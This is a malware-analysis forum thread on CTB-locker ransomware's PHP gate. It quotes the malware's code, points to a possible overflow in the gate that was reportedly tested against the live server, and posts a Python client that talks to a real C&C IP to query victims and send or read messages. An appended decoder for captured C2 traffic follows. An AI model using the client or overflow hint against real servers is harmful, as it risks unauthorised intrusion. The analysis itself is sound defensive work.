A forum for reverse engineering, OS internals and malware analysis 

 #27940  by tion
 Thu Feb 25, 2016 11:25 am
patriq wrote: Interesting function create_aes_cipher($keypass) .. just curious what he does with $keypass.
Code:
function create_aes_cipher($key) {
   $aes = new Crypt_AES();
   $aes->setKeyLength(256);
   $aes->setKey($key);
   return $aes;
}
Virus seems to be using a modified version of phpseclib.
 #27943  by eyecatchup
 Thu Feb 25, 2016 2:13 pm
Just for completeness: Here's a list of known decryption gates:
 #27945  by nl3dee
 Thu Feb 25, 2016 2:39 pm
Code:
$req = substr($_POST["msg"], 0, 2048);
socket_write($sock, $req, strlen($req));
makes me think of a potential buffer overflow.
Yesterday, overflowing the msg was inducing some abnormal latency on the server.
 #27947  by nl3dee
 Thu Feb 25, 2016 4:27 pm
Here is a simple Python client to play with the C&C server:
Code:
#!/usr/bin/env python
import argparse
import socket

def send(s, args):
    s.send('snd')
    s.send(args.domain.ljust(128))
    s.send(args.msg)

def read(s, args):
    s.send('rcv')
    s.send(args.domain.ljust(128))
    ret = s.recv(2048)
    print ret

def status(s, args):
    s.send('vic')
    s.send(args.domain.ljust(128))
    ret = s.recv(64)
    print ret

def main(args):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((args.host, args.port))
    try:
        args.action(s, args)
    finally:
        s.close()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CTB-locker client")
    parser.add_argument("-i", "--host", dest="host", type=str, default="95.215.45.203", help="C&C payment server")
    parser.add_argument("-p", "--port", dest="port", type=int, default=9338, help="C&C payment server")
    subparsers = parser.add_subparsers(title='subcommands', description='Action to perform')

    status_parser = subparsers.add_parser('status')
    status_parser.set_defaults(action=status)
    status_parser.add_argument(dest="domain", type=str, help="Victim domain to check")

    send_parser = subparsers.add_parser('send')
    send_parser.set_defaults(action=send)
    send_parser.add_argument(dest="domain", type=str, help="Victim domain to check")
    send_parser.add_argument(dest="msg", type=str, help="Message to send")

    read_parser = subparsers.add_parser('read')
    read_parser.set_defaults(action=read)
    read_parser.add_argument(dest="domain", type=str, help="Victim domain to check")

    args = parser.parse_args()

    main(args)
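A passive decoder for the client-side framing that client implies (3-byte command, domain left-justified in a 128-byte field, then for 'snd' a trailing message the gate truncates to 2048 bytes), as an added example that is not part of the thread; it is meant for annotating captured flows and opens no sockets. The field sizes and command names are taken from the client above, the sample streams are constructed.

```python
# Decoder for the client-side framing implied by the thread's Python client:
# 3-byte command ('vic'/'snd'/'rcv'), domain left-justified in a 128-byte
# field, and for 'snd' a trailing message the gate truncates to 2048 bytes.
# Analysis aid for captured flows only; it opens no sockets.
from dataclasses import dataclass, field
from typing import List, Optional

CMD_LEN = 3
DOMAIN_LEN = 128
MSG_MAX = 2048                     # substr($_POST["msg"], 0, 2048) in the gate
KNOWN_CMDS = {b"vic", b"snd", b"rcv"}


@dataclass
class C2Request:
    cmd: str
    domain: str
    msg: bytes
    warnings: List[str] = field(default_factory=list)


def parse_request(stream: bytes) -> Optional[C2Request]:
    """Parse the client->server bytes of one connection; None if not this protocol."""
    if len(stream) < CMD_LEN + DOMAIN_LEN or stream[:CMD_LEN] not in KNOWN_CMDS:
        return None
    cmd = stream[:CMD_LEN].decode()
    raw_domain = stream[CMD_LEN:CMD_LEN + DOMAIN_LEN].rstrip(b" ")
    msg = stream[CMD_LEN + DOMAIN_LEN:]
    req = C2Request(cmd, raw_domain.decode("ascii", "replace"), msg)
    if not raw_domain or b" " in raw_domain:
        req.warnings.append("malformed domain field")
    if cmd != "snd" and msg:
        req.warnings.append("unexpected trailing data after %s" % cmd)
    if len(msg) > MSG_MAX:
        req.warnings.append("msg is %d bytes, gate truncates to %d" % (len(msg), MSG_MAX))
    return req


# Constructed sample flows, not captured traffic.
SAMPLES = {
    "status": b"vic" + b"victim.example".ljust(DOMAIN_LEN),
    "send": b"snd" + b"victim.example".ljust(DOMAIN_LEN) + b"hello",
    "oversized": b"snd" + b"victim.example".ljust(DOMAIN_LEN) + b"A" * 3000,
    "not_c2": b"GET /access.php HTTP/1.1\r\n" + b" " * DOMAIN_LEN,
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, parse_request(data))
```

The oversized sample reproduces the condition nl3dee describes (a msg longer than the 2048 bytes the gate forwards), which is the case worth flagging in a capture.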